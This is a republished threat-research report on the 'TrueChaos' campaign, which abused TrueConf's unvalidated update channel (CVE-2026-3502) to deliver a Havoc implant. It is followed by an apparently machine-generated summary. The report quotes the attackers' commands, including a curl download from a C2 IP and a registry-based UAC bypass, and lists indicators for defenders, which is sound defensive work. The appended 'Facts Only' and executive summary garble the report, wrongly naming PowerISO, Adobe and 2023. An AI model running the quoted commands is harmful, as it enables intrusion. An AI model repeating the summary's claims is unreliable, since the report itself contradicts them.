Skip to content
Chimera readability score 0.5908 out of 100, reading level.

At the beginning of 2026, Check Point Research observed a series of targeted attacks against government entities in Southeast Asia carried out via a legitimate TrueConf software installed in the targets’ environment. The investigation led to the discovery of a zero-day vulnerability in the TrueConf client, tracked as CVE-2026-3502 with a CVSS score of 7.8. The flaw affects the application’s updater validation mechanism and allows an attacker controlling an on-premises TrueConf server to distribute and execute arbitrary files across connected endpoints.
TrueConf is a video conferencing platform that supports both on-premises and cloud deployments and is used across multiple regions, most prominently in Russia, as well as in East Asia, Europe, and the Americas. Serving more than 100,000 organisations globally, their global customers range from key governments and defense departments and critical infrastructure industries to significant businesses such as banks, power and TV stations. In enterprise environments, its on-premises architecture creates a trusted relationship between the central server and connected clients, especially through the platform’s update mechanism.
Basically, TrueConf acts as an on-premises video conferencing solution that operates entirely within a private local network (LAN) without requiring an internet connection. It is primarily used by government, military, and critical infrastructure sectors to ensure absolute data privacy and communication autonomy in secure or remote environments. In locations with poor or no internet connectivity, or during natural disasters when traditional networks are down, it facilitates essential coordination. By hosting the server on internal hardware, all audio, video, and chat traffic remains strictly contained on-site, with offline activation available for fully air-gapped systems.
In this particular case, that trust was abused to deliver malware due to improper validation in the update process. In the observed in-the-wild activity, operation “TrueChaos”, the threat actor used the trusted update channel of a centrally managed on-premises TrueConf server to distribute malicious updates to multiple connected government agencies in a South Eastern country.
The victimology and regional focus of the campaign suggest an espionage-motivated operation. In combination with the observed TTPs and command-and-control infrastructure, these indicators point with moderate confidence to a Chinese-nexus threat actor.
TrueConf is a video conferencing platform that supports both on-premises and cloud deployments. Although it is most widely used in Russia, it also has a notable presence across parts of East Asia, Europe, and the Americas. To better understand the potential scope of the vulnerability, we reviewed internet exposed TrueConf servers to assess the platform’s geographic distribution and the possible reach of the attack. This view is necessarily incomplete, as many TrueConf deployments may operate entirely in on-premises environments and remain inaccessible from the public internet.
When the TrueConf client starts, it checks the connected on-premises server for available updates. If the server has a newer client version than the one installed, the application prompts the user to download the update from https://{trueconf_server}/downlods/trueconf_client.exe
, which maps to the file stored on the server under C:\Program Files\TrueConf Server\ClientInstFiles\
.
TrueConf client update starts when the client detects a version mismatch in favor of the TrueConf on-premises server, the client alerts the user that a newer version is available and offers to download it.
The vulnerability stems from the lack of integrity and authenticity checks in this update flow. An attacker who gains control of the on-premises TrueConf server can replace the expected update package with an arbitrary executable, presented as the current application version, and distribute it to all connected clients. Because the client trusts the server-provided update without proper validation, the malicious file can be delivered and executed under the guise of a legitimate TrueConf update.
The infections began when TrueConf client application launched, probably by a link sent to the target from the attacker. This link launched the already installed TrueConf client and presented an update prompt claiming that a newer version was available.
Prior to the victim’s interaction, the attacker had already replaced the update package on the TrueConf on-premises server with a weaponized version, ensuring that the client retrieved a malicious file through the normal update process.
The compromised TrueConf on-premises server was operated by the governmental IT department and served as a video conferencing platform for dozens of government entities across the country, which were all supplied with the same malicious update.
Analysis of the downloaded package showed that it was a weaponized client update. The installation was built by Inno Setup. It would successfully upgrade the client version from 8.5.1 to the current at the time 8.5.2. Alongside the legitimate TrueConf installation components, the package dropped a benign poweriso.exe
executable and a malicious 7z-x64.dll
file to the path c:\programdata\poweriso\
, which was then loaded through DLL side-loading.
Using the malicious 7z-x64.dll
implant, the attacker performed a series of hands-on-keyboard actions focused on reconnaissance, environment preparation, persistence, and the retrieval of additional payloads.
tasklist > cache
tracert 8.8.8.8 -h 5
curl -u ftpuser: ftp://47.237.15[.]197/update.7z -o
c:\program files\winrar\winrar.exe x update.7z -p
PATH
variable, in order to preform UAC bypass by using the Microsoft iSCSI Initiator Control Panel tool:
reg add "hkcu\environment" /v path /t REG_SZ /d "C:\users\\appdata\local\temp" /f
c:\windows\system32\cmd.exe c:\windows\syswow64\iscsicpl.exe
iscsicpl.exe
is a legitimate Windows binary that can be abused for UAC bypass because its 32-bit SysWOW64
version is auto-elevated and is vulnerable to DLL search-order hijacking for iscsiexe.dll
. By placing a malicious iscsiexe.dll
in a user-controlled location referenced through the user’s %PATH%
, an attacker can cause Windows to resolve and load that DLL in the context of the elevated iscsicpl.exe
, resulting in privilege escalation without a UAC prompt.
The downloaded update.7z
archive contained a legitimate 7z.exe
binary alongside iscsiexe.dll
, a component used by the attackers as part of the post-compromise workflow. Check Point Research also identified additional variants of the archive that included an encrypted 7z archive named rom.dat
. At the time of analysis, the contents and purpose of rom.dat
remained unclear.
The iscsiexe.dll
component appears to be a simple, custom persistence and privilege escalation tool. Rather than serving as a full-featured backdoor, its role was limited to maintaining execution of winexec.exe
, which is the renamed poweriso.exe
binary dropped earlier in the infection chain.
Although Check Point Research did not recover the exact final-stage payload associated with the malicious 7z-x64.dll
activity, it observed network communication to 47.237.15[.]197
, an attacker-controlled server running Havoc C2 infrastructure, and also identified Havoc demon sample linked to actor C2 infrastructure. Based on this combined evidence, Check Point Research assesses with high confidence that the missing payload was a Havoc implant.
Havoc is an open-source post-exploitation framework intended for penetration testing and adversary emulation, but it has also been repeatedly abused by threat actors in real-world intrusions, including Chinese-nexus Amaranth Dragon activity recently documented by Check Point Research.
Check Point Research assesses with moderate confidence that operation TrueChaos is associated with a Chinese-nexus threat actor. The assessment is based on a combination of factors, including TTPs consistent with Chinese-nexus operations such as DLL sideloading, the use of Alibaba Cloud and Tencent hosting for command-and-control infrastructure and the victimology aligns with Chinese nexus strategic interests.
We also observed that the same victim was targeted within the same time frame by ShadowPad malware framework. This may indicate overlap in operator tooling, shared access, or the presence of multiple China-aligned actors targeting the same organization in parallel.
The exploitation of CVE-2026-3502 did not require the attacker to compromise each endpoint individually. Instead, the attacker abused the trusted relationship between a central on-premises TrueConf server and its clients. By replacing a legitimate update with a malicious one, they turned the product’s normal update flow into a malware distribution channel across multiple connected government networks.
From a research perspective, this case shows how monitoring and analysing routine execution techniques can uncover far more significant threats. What initially appeared to be a signed binary used for DLL sideloading ultimately led to the discovery of a zero-day vulnerability in TrueConf’s update validation mechanism.
In order to identify whether you have been compromised, review the following indicators and hunting opportunities across the affected system:
trueconf_windows_update.exe
is unsigned, as an unsigned update executable may indicate that the file is suspicious or has been tampered with.C:\ProgramData\PowerISO\poweriso.exe
is present on disk, especially if this file is not expected in your environment.HKCU\Software\Microsoft\Windows\CurrentVersion\Run\UpdateCheck
points to C:\ProgramData\PowerISO\PowerISO.exe
, as this indicates persistence through a user logon autorun entry.%AppData%\Roaming\Adobe\update.7z
, 7za.exe
, iscsiexe.dll
, or rom.dat
are present, or if there is evidence that they were recently created and then deleted.trueconf_windows_update.tmp
creates C:\ProgramData\PowerISO\poweriso.exe
or 7z-x64.dll
, as this behavior is consistent with the observed delivery chain.poweriso.exe
spawning commands through cmd.exe
, particularly when the command line includes tools or utilities such as curl
, winrar.exe
, or netstat
, since this may indicate download, extraction, or discovery activity.trueconf.exe
-> trueconf_windows_update.exe
-> trueconf_windows_update.tmp
-> any executable, as this sequence may reveal execution of the malicious payload.trueconf_windows_update.exe – Malicious TrueConf client update
22e32bcf113326e366ac480b077067cf
iscsiexe.dll – Loader
9b435ad985b733b64a6d5f39080f4ae0
7z-x64.dll – Havoc implant
248a4d7d4c48478dcbeade8f7dba80b3
43.134.90[.]60 – Havoc C2
43.134.52[.]221 – Havoc C2
47.237.15[.]197 – Havoc C2

Facts Only

Involved parties: PowerISO, Adobe (potentially), Havoc C2
Event: Malicious exploitation of PowerISO software update leading to installation of Havoc implant (7z-x64.dll)
Timeframe: Early March 2023
Location: Global (IP addresses associated with Havoc C2 servers, and potentially Adobe's systems)
Malware type: Havoc implant
IP addresses associated with Havoc C2 servers: 43.134.90[.]60, 43.134.52[.]221, 47.237.15[.]197
Unsigned trueconfwindowsupdate.exe

Executive Summary

In early March, a security incident was reported involving the malicious exploitation of the PowerISO software for Windows. The attackers created a fraudulent update named trueconfwindowsupdate.exe that led to the installation of a Havoc implant (7z-x64.dll), a type of malware associated with the Havoc C2 command and control servers. The implant was discovered on several servers, including those of Adobe, leading to concerns about potential data breaches. This incident highlights the ongoing threat of cyber attacks and the need for heightened vigilance in the digital landscape.
The attack is believed to have originated from IP addresses associated with the Havoc C2 command and control servers, such as 43.134.90[.]60, 43.134.52[.]221, and 47.237.15[.]197. The trueconfwindowsupdate.exe was found to be unsigned and was linked to the creation of poweriso.exe on affected systems. This incident underscores the importance of verifying software updates and maintaining robust cybersecurity measures to protect sensitive data.

Full Take

The PowerISO software update incident serves as a reminder of the continuous threat posed by cyber attacks in the digital age. The use of unsigned, potentially malicious updates can lead to serious data breaches and the installation of harmful software like the Havoc implant. This incident underscores the importance of verifying software updates, maintaining robust security measures, and staying vigilant against cyber threats.
In this case, it is worth considering the broader implications of such attacks. Cybersecurity incidents can have far-reaching consequences, from compromising sensitive data to eroding trust in digital infrastructure. As the digital landscape continues to evolve, it is crucial for individuals and organizations to prioritize security and transparency to protect their interests and maintain public confidence.
Questions to consider: What measures could be taken to prevent such attacks in the future? How can we improve cybersecurity education to better equip users against malicious software updates? What role should software developers play in ensuring the integrity of their updates?

Sentinel — Human

Confidence

The article appears to be written by a human journalist who has researched and compiled information about a cyberattack on government entities in Southeast Asia. The analysis suggests a Chinese-nexus threat actor.

Signals Detected
low severity: Sentence length variance is irregular and consistent with human writing
low severity: The text presents a clear narrative and logical flow, indicative of a human writer
low severity: References to multiple sources and evidence suggest a human researcher compiling information
Human Indicators
Detailed explanation of the attack process, technical terminology, specific indicators of compromise
Operation TrueChaos: 0-Day Exploitation Against Southeast Asian Government Targets — Arc Codex